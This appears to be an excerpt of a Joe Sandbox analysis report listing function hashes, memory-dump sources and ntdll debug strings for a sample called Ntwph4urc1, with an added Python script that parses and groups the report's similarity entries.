                                            • Opcode ID: 04a6d2dcb62002dc0a4a04c5bf79a7ec4b52bc8d255182dacc3920575857a124
                                            • Instruction ID: 48ae0584c65f47da265f9aad09ec0a3b36b8a01c01ffac2b2223bbc46df31378
                                            • Opcode Fuzzy Hash: 04a6d2dcb62002dc0a4a04c5bf79a7ec4b52bc8d255182dacc3920575857a124
                                            • Instruction Fuzzy Hash: 6F90027170168802D1107198C50874A004A47D0311F59C452A543461CD869989957121
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32444c28429f0a234425647b9be68c9bc02ebe065a5f0dfc484fd75738583fd7
                                            • Instruction ID: 4344da8a442ea84dc7b00f3c39716a52b56f439657da31734d6012c8d8a7783b
                                            • Opcode Fuzzy Hash: 32444c28429f0a234425647b9be68c9bc02ebe065a5f0dfc484fd75738583fd7
                                            • Instruction Fuzzy Hash: 6490027170160842D10071988508B46004A47E0311F55C057A1134618D8619C9557521
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2337288a99fa4424c8c38f9ed072aac53b30fa16cdc1fbc79e51dc8ebc352336
                                            • Instruction ID: 5547894dfd1223782297d6e8677466836bfd9766f7e642f83548620bc3fd277a
                                            • Opcode Fuzzy Hash: 2337288a99fa4424c8c38f9ed072aac53b30fa16cdc1fbc79e51dc8ebc352336
                                            • Instruction Fuzzy Hash: FC90027174160402D14171988508606004E57D0251F95C053A1434518E86598B5AAA61
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6869dcd37c5d8d3971437bdf16a9706af643d890cf74260592c70bee0e2f50fb
                                            • Instruction ID: 2d7469c67c3bdef864eb9d08bbf6a8e8c150ff73b69a9b471c439842bbda3adb
                                            • Opcode Fuzzy Hash: 6869dcd37c5d8d3971437bdf16a9706af643d890cf74260592c70bee0e2f50fb
                                            • Instruction Fuzzy Hash: 07900261742641525545B1988508507404B57E0251795C053A2424914C852A995AD621
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f70fa34739d14e8cd54a9026d9486bd37b9624a7b08efbb3da3aaecbdab89b59
                                            • Instruction ID: fb14f57ec6d5944b7ced51f498da2d849604104b60a074258d3d8fe0dd431027
                                            • Opcode Fuzzy Hash: f70fa34739d14e8cd54a9026d9486bd37b9624a7b08efbb3da3aaecbdab89b59
                                            • Instruction Fuzzy Hash: DA90026971360002D1807198950C60A004A47D1212F95D456A102551CCC919896D5321
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebf8ba8ebd4215f667f10c55dc735b3520696e2fca42f5a5172737a1b6a7fd0d
                                            • Instruction ID: ce8cdf2afbe79b0fc3ea2eec2d89ae7e858aae5351ed6d84a285691d670f8956
                                            • Opcode Fuzzy Hash: ebf8ba8ebd4215f667f10c55dc735b3520696e2fca42f5a5172737a1b6a7fd0d
                                            • Instruction Fuzzy Hash: 0F90026170564442D1007598950CA06004A47D0215F55D052A2074559DC6398955A131
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab4aa9b999e46e96b1da053ba3418cdba0fb8228872a983a4189a5084856e335
                                            • Instruction ID: 41ddfaa68b69a03edd5cb69b8f332eae1ae9b187c9ad08da69e33061e8a4f565
                                            • Opcode Fuzzy Hash: ab4aa9b999e46e96b1da053ba3418cdba0fb8228872a983a4189a5084856e335
                                            • Instruction Fuzzy Hash: 7D90026170160003D1407198951C606404A97E1311F55D052E1424518CD919895A5222
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cac56d892b27095eadceb8d40efd75e0a971ea9cb207b4144cba518c0e1067b9
                                            • Instruction ID: c1c0948cd025835a33364ffd68164d6b7993a41f3bcff2fbc23eeabc142ef5e2
                                            • Opcode Fuzzy Hash: cac56d892b27095eadceb8d40efd75e0a971ea9cb207b4144cba518c0e1067b9
                                            • Instruction Fuzzy Hash: 179002E1701740924500B298C508B0A454A47E0211B55C057E2064524CC52989559135
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9de4003468effa5460b5f42bd0527ec9d4b3bf4fcc36335c9a088055183a89c
                                            • Instruction ID: aafd1029a64c9e75418eb606001e453af7662e4bf78f854c518888c7a103210c
                                            • Opcode Fuzzy Hash: b9de4003468effa5460b5f42bd0527ec9d4b3bf4fcc36335c9a088055183a89c
                                            • Instruction Fuzzy Hash: 22900265711600030105B5984708507008B47D5361355C062F2025514CD62589655121
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a63de9b3a854a35717840df837ae6e63c3522f81a9b1820594f3007a8f46517
                                            • Instruction ID: 360c2c17b16119dc3d2f694499311bf3be6bf2f08a05501b23aa2b6434ca145d
                                            • Opcode Fuzzy Hash: 9a63de9b3a854a35717840df837ae6e63c3522f81a9b1820594f3007a8f46517
                                            • Instruction Fuzzy Hash: 16900265721600020145B598470850B048A57D6361395C056F2426554CC62589695321
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0db8518b0ddb42439de2cf9813e747ebf9b431fec030410a0d40a54fd8e54534
                                            • Instruction ID: 319e9499758c3db8f9361f4b3023f33b9b89c77a1cb3477a1a644c1a5b2844f1
                                            • Opcode Fuzzy Hash: 0db8518b0ddb42439de2cf9813e747ebf9b431fec030410a0d40a54fd8e54534
                                            • Instruction Fuzzy Hash: 9190027170160802D10471988908686004A47D0311F55C052A7034619E966989957131
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 694ebf98a8a623fa5cb2498cc4298804d873aca2c1de42ad3c160a64d51bf283
                                            • Instruction ID: fea0ac5d1892c7c6a0cbae71aa727c6b359435083aae3c309db1296572430ce3
                                            • Opcode Fuzzy Hash: 694ebf98a8a623fa5cb2498cc4298804d873aca2c1de42ad3c160a64d51bf283
                                            • Instruction Fuzzy Hash: 53900271B0560802D15071988518746004A47D0311F55C052A1034618D87598B5976A1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4537dce3509e6837da2aaed1606d56eb58b3d1534e0cd747266e0ecd22a1b36d
                                            • Instruction ID: b584117a4167ef49d7a5799e1caa12be8d37a94bf0993ef376d9503fd091655f
                                            • Opcode Fuzzy Hash: 4537dce3509e6837da2aaed1606d56eb58b3d1534e0cd747266e0ecd22a1b36d
                                            • Instruction Fuzzy Hash: B790027170160802D1807198850864A004A47D1311F95C056A1035618DCA198B5D77A1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a989e0d20eec1c41254c1666c4ffb28fb1d496785a686872fbeccc63178a1fe
                                            • Instruction ID: 89433300cc390ac7219dae5100bea56ad192d36c961292e984849c51111618cf
                                            • Opcode Fuzzy Hash: 9a989e0d20eec1c41254c1666c4ffb28fb1d496785a686872fbeccc63178a1fe
                                            • Instruction Fuzzy Hash: FA90027170564842D14071988508A46005A47D0315F55C052A1074658D96298E59B661
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8f06e96181e54bcaac261f015eaf2d155a6f1c3315d15f56bd27d155b4b9366
                                            • Instruction ID: 2c0fed77c1d074607d2059dea74df4190b11b2cf11894db1cd2caccab5e6105a
                                            • Opcode Fuzzy Hash: e8f06e96181e54bcaac261f015eaf2d155a6f1c3315d15f56bd27d155b4b9366
                                            • Instruction Fuzzy Hash: DD9002A170260003410571988518616404F47E0211B55C062E2024554DC52989956125
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: cebe6e5153ef7459c777dec09233c69bc661321eecdc66836aba1de842b89ca7
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:

                                             Control-flow Graph

                                             • Rendered graph omitted. Function entry 36992890; basic blocks are marked Executed / Not Executed; the graph's only call target is 369a0050.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 12a82326876f1e6775b2afee132444f4421e8fcf94b59ced00d73ba63ab2495c
                                            • Instruction ID: 41ace1efa1336b4a2121f51b1c0636317287eed26c49e2f5b95492f24f92e166
                                            • Opcode Fuzzy Hash: 12a82326876f1e6775b2afee132444f4421e8fcf94b59ced00d73ba63ab2495c
                                            • Instruction Fuzzy Hash: 6951F6B5E10266BFEB54DFA9C9809BEF7F8BB08244760C169E494DB241D634DE00CBE1

                                             Control-flow Graph

                                             • Rendered graph omitted. Function entry 36a02410; basic blocks are marked Executed / Not Executed; the graph's only call target is 369a0510.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: f039b46b7622de3b8af4c8e2ee0008c4ab1fba1f92282e0d8b9e5a89f2734948
                                            • Instruction ID: ce47cfb490a9196df954ad8d6f47354209f7cbc9af50ed6ff70e91ea482d5341
                                            • Opcode Fuzzy Hash: f039b46b7622de3b8af4c8e2ee0008c4ab1fba1f92282e0d8b9e5a89f2734948
                                            • Instruction Fuzzy Hash: 75513A79A00745AEEB20DF5DDC9087FB7F8EF48244B50846AE8D5C7645DA78EA00CF68
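                                             The two function blocks above share the same API ID (___swprintf_l), the same String ID list and therefore the same API String ID (48624451-2108815105), which is how the report's similarity data is meant to be pivoted on. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the per-function "Similarity" layout as printed on this page, flags incomplete blocks (the page has one with an empty Instruction Fuzzy Hash), and groups Opcode IDs by API String ID. The input is an excerpt constructed from four blocks on this page; the `$` separator in String ID lists is as printed here, and the assumption that `$` never occurs inside a matched string is mine.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: four "Similarity" blocks copied from this report. The IDs are
# the page's own values; the fourth block keeps its empty Instruction Fuzzy Hash.
SAMPLE_REPORT = """\
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 12a82326876f1e6775b2afee132444f4421e8fcf94b59ced00d73ba63ab2495c
• Instruction ID: 41ace1efa1336b4a2121f51b1c0636317287eed26c49e2f5b95492f24f92e166
• Opcode Fuzzy Hash: 12a82326876f1e6775b2afee132444f4421e8fcf94b59ced00d73ba63ab2495c
• Instruction Fuzzy Hash: 6951F6B5E10266BFEB54DFA9C9809BEF7F8BB08244760C169E494DB241D634DE00CBE1
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: f039b46b7622de3b8af4c8e2ee0008c4ab1fba1f92282e0d8b9e5a89f2734948
• Instruction ID: ce47cfb490a9196df954ad8d6f47354209f7cbc9af50ed6ff70e91ea482d5341
• Opcode Fuzzy Hash: f039b46b7622de3b8af4c8e2ee0008c4ab1fba1f92282e0d8b9e5a89f2734948
• Instruction Fuzzy Hash: 75513A79A00745AEEB20DF5DDC9087FB7F8EF48244B50846AE8D5C7645DA78EA00CF68
Similarity
• API ID: DebugPrintTimes
• String ID: HEAP:
• API String ID: 3446177414-2466845122
• Opcode ID: e541c6c110b0ed1d21601264d420929633a29a24db7cbd656cba5e0bb282ef9a
• Instruction ID: 468bd57b4b5ef1a4529c9ef9a59bd44ae199e0af0e6f25444b2d43a70f4e6891
• Opcode Fuzzy Hash: e541c6c110b0ed1d21601264d420929633a29a24db7cbd656cba5e0bb282ef9a
• Instruction Fuzzy Hash: D1A18775A483128FE705CF29C890A1AB7E6BB88354F15456AEE45DB310EBB1EC06CB91
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction ID: cebe6e5153ef7459c777dec09233c69bc661321eecdc66836aba1de842b89ca7
• Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction Fuzzy Hash:
"""

# One "• Key: value" line; the value may be empty and may itself contain ':'.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
HEX64 = re.compile(r"^[0-9a-f]{64}$")

KEYMAP = {
    "API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
    "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
    "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy",
}


@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""

    def strings(self):
        # The report joins the strings referenced by a function with '$'
        # (assumption: '$' does not occur inside a matched string).
        return [s for s in self.string_id.split("$") if s]


def parse_similarity_blocks(text):
    """Return one FunctionRecord per 'Similarity' block, in document order."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            current = FunctionRecord()
            records.append(current)
            continue
        match = FIELD_RE.match(line) if current is not None else None
        if match and match.group("key") in KEYMAP:
            setattr(current, KEYMAP[match.group("key")], match.group("val"))
    return records


def validate(rec):
    """Return the problems found in one block; an empty list means it is complete."""
    problems = []
    for name in ("opcode_id", "instruction_id", "opcode_fuzzy"):
        if not HEX64.match(getattr(rec, name)):
            problems.append(f"{name} is not a 64-hex-digit value")
    # In this report the Opcode ID and the Opcode Fuzzy Hash always carry the same value.
    if rec.opcode_id != rec.opcode_fuzzy:
        problems.append("opcode_id differs from opcode_fuzzy")
    if not rec.instruction_fuzzy:
        problems.append("instruction_fuzzy is empty")
    return problems


def group_by_api_string_id(records):
    """Map API String ID -> Opcode IDs of the functions sharing it; blocks with
    no API/string evidence (empty API String ID) cannot be pivoted on and are skipped."""
    groups = defaultdict(list)
    for rec in records:
        if rec.api_string_id:
            groups[rec.api_string_id].append(rec.opcode_id)
    return dict(groups)


if __name__ == "__main__":
    recs = parse_similarity_blocks(SAMPLE_REPORT)
    for i, rec in enumerate(recs):
        print(i, rec.api_id or "<no API>", rec.strings(), validate(rec))
    for key, ids in group_by_api_string_id(recs).items():
        print(key, "->", ids)
```

Run against the whole report text rather than this excerpt, the grouping gives a quick list of which function bodies share an API/string profile; a block that fails `validate` should be excluded before its fuzzy hashes are used to query other reports, since the empty Instruction Fuzzy Hash on this page would otherwise match nothing or everything depending on the tool.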

                                             Control-flow Graph

                                             • Rendered graph omitted. Function entry 36a2a670; basic blocks are marked Executed / Not Executed; call targets in the graph are 36962410 (twice), 369625b0 (twice), 36994c30 and RtlDebugPrintTimes (from several blocks).
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: HEAP:
                                            • API String ID: 3446177414-2466845122
                                            • Opcode ID: e541c6c110b0ed1d21601264d420929633a29a24db7cbd656cba5e0bb282ef9a
                                            • Instruction ID: 468bd57b4b5ef1a4529c9ef9a59bd44ae199e0af0e6f25444b2d43a70f4e6891
                                            • Opcode Fuzzy Hash: e541c6c110b0ed1d21601264d420929633a29a24db7cbd656cba5e0bb282ef9a
                                            • Instruction Fuzzy Hash: D1A18775A483128FE705CF29C890A1AB7E6BB88354F15456AEE45DB310EBB1EC06CB91

                                             Control-flow Graph

                                             • Rendered graph omitted. Function entry 36987630; basic blocks are marked Executed / Not Executed; call targets in the graph are 3695e660, 36987818, 369877cd, 36987728, 3698771b, 36992c50, 36994c30, 36994d48, 36999020, 3699a770, 3699aaa0, 369ccf9e, 369df290 (several times), RtlDebugPrintTimes and BaseQueryModuleData.
                                            Strings
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 369C4655
                                            • ExecuteOptions, xrefs: 369C46A0
                                            • Execute=1, xrefs: 369C4713
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 369C4742
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 369C4787
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 369C46FC
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 369C4725
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 3f093daa3d448020949b1d3b7faf07a865af8a4b0cf979c347d5fec14c1fc87d
                                            • Instruction ID: 45ea509e2af9f05c893e5d9fa7ffb5a624bbaee7fa4e61194f01d7b2df3b97d1
                                            • Opcode Fuzzy Hash: 3f093daa3d448020949b1d3b7faf07a865af8a4b0cf979c347d5fec14c1fc87d
                                            • Instruction Fuzzy Hash: 37514A75A00329AAEF10DBA5DC89FEE77ACEF44304F2400E9D605AB191DB319E45CF62
                                            Strings
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369B79FA
                                            • SsHd, xrefs: 3696A3E4
                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 369B7AE6
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 369B79D0, 369B79F5
                                            • Actx , xrefs: 369B7A0C, 369B7A73
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369B79D5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
